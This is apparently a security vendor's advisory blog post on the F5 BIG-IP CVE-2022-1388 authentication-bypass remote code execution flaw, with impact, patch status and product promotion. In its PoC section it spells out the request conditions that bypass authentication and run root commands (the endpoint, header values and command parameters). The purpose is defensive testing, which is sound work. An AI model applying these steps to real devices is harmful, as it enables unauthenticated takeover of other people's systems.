Simulating and Preventing F5 BIG-IP CVE-2022-1388 RCE Exploits

On May 18th, 2022, The Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing & Analysis Center (MS-ISAC) released a joint advisory on the remote code execution (CVE-2022-1388) vulnerability found in the F5 BIG-IP products [1]. When exploited, the CVE-2022-1388 vulnerability allows attackers to run arbitrary code and gain control of affected products.

Picus Labs has updated the Picus Threat Library with simulations for CVE-2022-1388 vulnerability exploitation attacks affecting F5 BIG-IP products.

Start simulating CVE-2022-1388 attacks with a 14-Day Free Trial of the Picus Platform 

What Is the CVE-2022-1388 Vulnerability?

F5 Networks published information about the CVE-2022-1388 remote code execution vulnerability on May 4th, 2022 [2]. An unauthenticated adversary with network access may exploit CVE-2022-1388 vulnerability to execute arbitrary commands using the management port or self-IP address. 

"/mgmt/tm/util/bash" service in F5 BIG-IP is a feature that allows users to run commands as the root user of the BIG-IP. The service does not require a password or authentication. Therefore, if adversaries have network access to affected F5 BIG-IP products, they can execute commands remotely with elevated privileges. 

What Is the Impact of the CVE-2022-1388 Vulnerability?

48 of the Fortune 50 companies use F5 products. Due to its wide use, the exploitation of CVE-2022-1388 may have serious consequences. Since the vulnerability allows unauthenticated attackers to execute arbitrary code on F5 BIG-IP products, the CVSSv3 base score for CVE-2022-1388 is 9.8 Critical. 

CVE-2022-1388 vulnerability enables remote code executions on systems running vulnerable F5 BIG-IP versions and allows the attacker complete control of the affected server.  For example, attackers can exploit CVE-2022-1388 to run malicious codes and install webshells as backdoors on vulnerable systems for maintaining access and post-exploitation.

Which F5 BIG-IP Versions Are Affected?

Affected and fixed F5 BIG-IP versions are shown in the below table:

What Is the Current Situation?

F5 released a patch for affected products on May 4th, 2022, alongside the security advisory of the vulnerability. 17.x versions are not affected by the CVE-2022-1388 vulnerability. Since versions 12.1.x and 11.6.x are end-of-life (EOL), the patches are not available for these versions. 

What Should You Do?

Since F5 BIG-IP is a widely used product and public proof-of-concept (PoC) codes for exploiting the CVE-2022-1388 vulnerability are available, the users are advised to patch their affected products without delay.  

CVE-2022-1388 F5 BIG-IP PoC Exploit

The following conditions are required to exploit CVE-2022-1388 vulnerability: 

• A POST request must be sent to the vulnerable endpoint, which is "/mgmt/tm/util/bash"
• X-F5-Auth-Token must be present as a header
  • Example: X-F5-Auth-Token: 0
• The "Authorization" header must contain the "admin" username and any password.
  • Example: Authorization: Basic YWRtaW46 YWRtaW46 is the Base64 encoded version of “admin:”, which means the username is "admin" and password is "" (empty), which is also valid.
• The "Connection" header must contain the "X-F5-Auth-Token" header field
• Example: Connection: X-F5-Auth-Token
• The "Host" header must be localhost / 127.0.0.1, or the "Connection" header must include "X-Forwarded-Host"
• Example: Connection: X-F5-Auth-Token, X-Forwarded-Host‘
• The value of the "command" parameter in the POST request must be "run"
• Example: "command": "run"
• The value of the "utilCmdArgs" parameter in the POST request must be a valid Linux command.
• Example: "utilCmdArgs": " -c 'whoami' "

Therefore, you can test your F5 BIG-IP devices against CVE-2022-1388 vulnerability exploitation attacks with the following POST request:

Example Code: Proof of Concept POST request for CVE-2022-1388 exploit

How Picus Helps Simulate and Prevent CVE-2022-1388 F5 BIG-IP Remote Code Execution Exploits?

We also strongly suggest simulating CVE-2022-1388 vulnerability to test the effectiveness of your security controls like Web Application Firewalls (WAF), Intrusion Prevention Systems (IPS), and NGFW against F5 BIG-IP RCE attacks using the Picus’ The Complete Security Control Validation Platform. You can test your defenses against CVE-2022-1388 vulnerability and hundreds of commonly exploited vulnerabilities within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for CVE-2022-1388 vulnerability: 

This threat in Picus Threat Library also includes the following actions for previous F5 BIG-IPvulnerabilities: 

Moreover, Picus Threat Library contains 150+ threats containing 1500+ web application and vulnerability exploitation attacks in addition to 3500+ endpoint, malware, email, and data exfiltration threats as of today.

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address CVE-2022-1388 F5 BIG-IP RCE and other vulnerability exploitation attacks in preventive security controls. Currently, Picus Labs validated the following signatures:

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trial  of Picus’ The Complete Security Control Validation Platform.

References

[1] https://www.cisa.gov/uscert/sites/default/files/publications/AA22-138A-Threat_Actors_Exploiting_F5_BIG-IP_CVE-2022-1388_F5.pdf

[2] https://support.f5.com/csp/article/K23605346